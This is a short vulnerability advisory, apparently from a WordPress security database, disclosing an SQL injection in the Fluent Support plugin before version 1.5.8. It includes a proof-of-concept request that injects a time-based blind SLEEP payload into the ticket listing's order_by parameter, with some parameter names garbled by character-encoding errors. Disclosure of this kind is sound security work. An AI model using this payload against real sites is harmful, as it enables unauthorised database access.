The plugin does not properly sanitise, validate and escape various parameters before using them in an SQL statement, leading to an SQL Injection vulnerability exploitable by high privilege users
With at least one support ticket in the system: https://example.com/?rest_route=/fluent-support/v2/tickets&page;=1&per;_page=10ℴ_by=priority`=`priority` AND (SELECT 9285 FROM (SELECT(SLEEP(5)))BuXj)%20AND%20priority
=`priorityℴ_type=ASC&_wpnonce=f8394cb76d Nonce is retrieved via https://example.com/wp-admin/admin-ajax.php?action=rest-nonce
CPE | Name | Operator | Version |
---|---|---|---|
fluent-support | lt | 1.5.8 |